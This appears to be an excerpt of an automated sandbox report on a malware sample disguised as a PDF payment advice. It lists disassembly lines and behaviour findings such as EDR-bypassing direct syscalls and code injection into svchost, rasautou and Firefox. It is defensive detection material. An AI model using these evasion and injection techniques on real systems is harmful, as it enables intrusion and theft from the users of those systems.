                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h]8_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385EB20 mov eax, dword ptr fs:[00000030h]8_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385EB20 mov eax, dword ptr fs:[00000030h]8_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F8B28 mov eax, dword ptr fs:[00000030h]8_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F8B28 mov eax, dword ptr fs:[00000030h]8_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E4B4B mov eax, dword ptr fs:[00000030h]8_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E4B4B mov eax, dword ptr fs:[00000030h]8_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03902B57 mov eax, dword ptr fs:[00000030h]8_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03902B57 mov eax, dword ptr fs:[00000030h]8_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03902B57 mov eax, dword ptr fs:[00000030h]8_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03902B57 mov eax, dword ptr fs:[00000030h]8_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C6B40 mov eax, dword ptr fs:[00000030h]8_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C6B40 mov eax, dword ptr fs:[00000030h]8_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FAB40 mov eax, dword ptr fs:[00000030h]8_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D8B42 mov eax, dword ptr fs:[00000030h]8_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03828B50 mov eax, dword ptr fs:[00000030h]8_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DEB50 mov eax, dword ptr fs:[00000030h]8_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382CB7E mov eax, dword ptr fs:[00000030h]8_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h]8_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904A80 mov eax, dword ptr fs:[00000030h]8_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868A90 mov edx, dword ptr fs:[00000030h]8_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838AA0 mov eax, dword ptr fs:[00000030h]8_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838AA0 mov eax, dword ptr fs:[00000030h]8_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03886AA4 mov eax, dword ptr fs:[00000030h]8_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03886ACC mov eax, dword ptr fs:[00000030h]8_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03886ACC mov eax, dword ptr fs:[00000030h]8_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03886ACC mov eax, dword ptr fs:[00000030h]8_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830AD0 mov eax, dword ptr fs:[00000030h]8_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03864AD0 mov eax, dword ptr fs:[00000030h]8_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03864AD0 mov eax, dword ptr fs:[00000030h]8_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386AAEE mov eax, dword ptr fs:[00000030h]8_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386AAEE mov eax, dword ptr fs:[00000030h]8_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BCA11 mov eax, dword ptr fs:[00000030h]8_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386CA24 mov eax, dword ptr fs:[00000030h]8_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385EA2E mov eax, dword ptr fs:[00000030h]8_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03854A35 mov eax, dword ptr fs:[00000030h]8_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03854A35 mov eax, dword ptr fs:[00000030h]8_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386CA38 mov eax, dword ptr fs:[00000030h]8_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h]8_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840A5B mov eax, dword ptr fs:[00000030h]8_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840A5B mov eax, dword ptr fs:[00000030h]8_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386CA6F mov eax, dword ptr fs:[00000030h]8_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386CA6F mov eax, dword ptr fs:[00000030h]8_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386CA6F mov eax, dword ptr fs:[00000030h]8_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DEA60 mov eax, dword ptr fs:[00000030h]8_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038ACA72 mov eax, dword ptr fs:[00000030h]8_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038ACA72 mov eax, dword ptr fs:[00000030h]8_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h]8_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038309AD mov eax, dword ptr fs:[00000030h]8_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038309AD mov eax, dword ptr fs:[00000030h]8_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B89B3 mov esi, dword ptr fs:[00000030h]8_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B89B3 mov eax, dword ptr fs:[00000030h]8_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B89B3 mov eax, dword ptr fs:[00000030h]8_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C69C0 mov eax, dword ptr fs:[00000030h]8_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h]8_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h]8_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h]8_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h]8_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h]8_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h]8_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038649D0 mov eax, dword ptr fs:[00000030h]8_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FA9D3 mov eax, dword ptr fs:[00000030h]8_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BE9E0 mov eax, dword ptr fs:[00000030h]8_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038629F9 mov eax, dword ptr fs:[00000030h]8_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038629F9 mov eax, dword ptr fs:[00000030h]8_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE908 mov eax, dword ptr fs:[00000030h]8_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE908 mov eax, dword ptr fs:[00000030h]8_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BC912 mov eax, dword ptr fs:[00000030h]8_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03828918 mov eax, dword ptr fs:[00000030h]8_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03828918 mov eax, dword ptr fs:[00000030h]8_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B892A mov eax, dword ptr fs:[00000030h]8_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C892B mov eax, dword ptr fs:[00000030h]8_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B0946 mov eax, dword ptr fs:[00000030h]8_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904940 mov eax, dword ptr fs:[00000030h]8_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03856962 mov eax, dword ptr fs:[00000030h]8_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03856962 mov eax, dword ptr fs:[00000030h]8_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03856962 mov eax, dword ptr fs:[00000030h]8_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387096E mov eax, dword ptr fs:[00000030h]8_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387096E mov edx, dword ptr fs:[00000030h]8_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387096E mov eax, dword ptr fs:[00000030h]8_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D4978 mov eax, dword ptr fs:[00000030h]8_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D4978 mov eax, dword ptr fs:[00000030h]8_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BC97C mov eax, dword ptr fs:[00000030h]8_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830887 mov eax, dword ptr fs:[00000030h]8_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BC89D mov eax, dword ptr fs:[00000030h]8_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E8C0 mov eax, dword ptr fs:[00000030h]8_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039008C0 mov eax, dword ptr fs:[00000030h]8_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FA8E4 mov eax, dword ptr fs:[00000030h]8_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C8F9 mov eax, dword ptr fs:[00000030h]8_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C8F9 mov eax, dword ptr fs:[00000030h]8_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BC810 mov eax, dword ptr fs:[00000030h]8_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03852835 mov eax, dword ptr fs:[00000030h]8_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03852835 mov eax, dword ptr fs:[00000030h]8_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03852835 mov eax, dword ptr fs:[00000030h]8_2_03852835
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_008980A9
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086A124 SetUnhandledExceptionFilter,0_2_0086A124
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0086A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\rasautou.exeThread register set: target process: 3020Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\rasautou.exeThread APC queued: target process: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D81008Jump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008987B1 LogonUserW,0_2_008987B1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00843B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00843B3A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008448D7
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A4C27 mouse_event,0_2_008A4C27
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeProcess created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00897CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00897CAF
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0089874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0089874B
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
